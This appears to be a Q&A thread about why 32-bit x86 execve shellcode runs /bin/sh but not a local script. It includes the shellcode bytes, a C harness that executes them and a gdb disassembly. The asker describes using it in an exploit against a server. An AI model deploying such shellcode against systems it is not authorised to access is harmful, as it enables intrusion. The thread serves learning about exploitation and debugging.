# shellcode executes /bin/sh but not ./abcde

Tags: c, assembly, x86, shellcode

I am trying to run some shellcode on a server where I dont have access to the shell, but I have access to my own executable bash script.

My shellcode looks like this:

```
 unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
                        "\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
```

When I run it locally, I spawn a shell with the code. I can also run other commands such as /bin/ls... However, when I try to change /bin/sh in favor of ./abcde it wont run my executable.

```
 unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
                        "\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";
```

What am I doing wrong? I am on a x86-32 machine..

EDIT: 
To make it more clear, this is the scenario:

```
 unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
                   "\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";

  unsigned char code1[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
                   "\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";

 int main(void){
 void (*f)(void);
 f = (void (*)(void))code; //works
 f = (void (*)(void))code1; //Does NOT work
 f();
 }
```

Comment: So basically you are trying to circumvent a limitation imposed on a machine not owned by you... You should edit the question and clarify the actual scenario if you want people to be willing to help you. Is this taken from a contest? Or what?

Comment: Its actually on my own machine - but I am doing the exploit through a server-client (both on my machine), and due to the server, I am not able to spawn a spawn a shell and throw it commands. But I have made a bash script that can be executed in the directory of which I am calling, and would like to execute this script. Also - the shellcode does spawn a shell if I test it in a small program locally, but does not run my script if I substitute /bin/sh to ./abcde.

Comment: try the full path to the script. say `/home/user/abcde`

Comment: @SakthiKumar I tried - doesnt work :/

Comment: @StefanoSanfilippo I edited the question, is it more clear now?

Comment: Did you set the execution permission?

Comment: The content was clear before, what you should clarify is that you are not doing anything illegal here, since the topic is borderline. By the way, what user is the script executed as? Does it have execute permission for your executable? And read access to the folder?

Comment: Thanks @Devolus!! Cant believe I missed that.

Answer (score 0):

Your program is not very portable as you include ia32 instructions in your strings. With some help from gdb it was easier to read:

```
  (gdb) disassemble/r code,code1
  Dump of assembler code from 0x804a040 to 0x804a080:
       0x0804a040 <code+0>: eb 15   jmp    0x804a057 <code+23>
       0x0804a042 <code+2>: 5b      pop    %ebx
       0x0804a043 <code+3>: 31 c0   xor    %eax,%eax
       0x0804a045 <code+5>: 89 5b 08        mov    %ebx,0x8(%ebx)
       0x0804a048 <code+8>: 88 43 07        mov    %al,0x7(%ebx)
       0x0804a04b <code+11>:        8d 4b 08        lea    0x8(%ebx),%ecx
       0x0804a04e <code+14>:        89 43 0c        mov    %eax,0xc(%ebx)
       0x0804a051 <code+17>:        89 c2   mov    %eax,%edx
       0x0804a053 <code+19>:        b0 0b   mov    $0xb,%al
       0x0804a055 <code+21>:        cd 80   int    $0x80
       0x0804a057 <code+23>:        e8 e6 ff ff ff  call   0x804a042 <code+2>
       0x0804a05c <code+28>:        2f      das
       0x0804a05d <code+29>:        62 69 6e        bound  %ebp,0x6e(%ecx)
       0x0804a060 <code+32>:        2f      das
       0x0804a061 <code+33>:        73 68   jae    0x804a0cb
       0x0804a063 <code+35>:        00 00   add    %al,(%eax)
       0x0804a065:  00 00   add    %al,(%eax)
       0x0804a067:  00 00   add    %al,(%eax)
       0x0804a069:  00 00   add    %al,(%eax)
       0x0804a06b:  00 00   add    %al,(%eax)
       0x0804a06d:  00 00   add    %al,(%eax)
       0x0804a06f:  00 00   add    %al,(%eax)
       0x0804a071:  00 00   add    %al,(%eax)
       0x0804a073:  00 00   add    %al,(%eax)
       0x0804a075:  00 00   add    %al,(%eax)
       0x0804a077:  00 00   add    %al,(%eax)
       0x0804a079:  00 00   add    %al,(%eax)
       0x0804a07b:  00 00   add    %al,(%eax)
       0x0804a07d:  00 00   add    %al,(%eax)
       0x0804a07f:  00 eb   add    %ch,%bl
```

however a helpful compiler puts the code in a variable segment which will cause a segmentation fault when the processor jumps to the "string" adn tries to execute from it.

I think this is a similar question:
[sys_execve system call from Assembly](https://stackoverflow.com/questions/9342410/sys-execve-system-call-from-assembly)

Answer (score 0):

A careful reading of the question reveals what is actually going on. Indeed the compiler will happily bork you by placing this in a variable region; however the OS platform targeted probably doesn't have NX enabled (enabling NX on arbitrary 32 bit process was a recipe for disaster for a long time as GCC extensions required the *stack* to be executable).

The actual problem is you don't have execute access to bash. Your ./abcde is a bash script by your own admission, so the loader interprets #!/bin/bash, goes to open /bin/bash and discovers you don't have x permissions and barfs. exec() returns -Esomething with unpredictable results when you run off the end of the shellcode.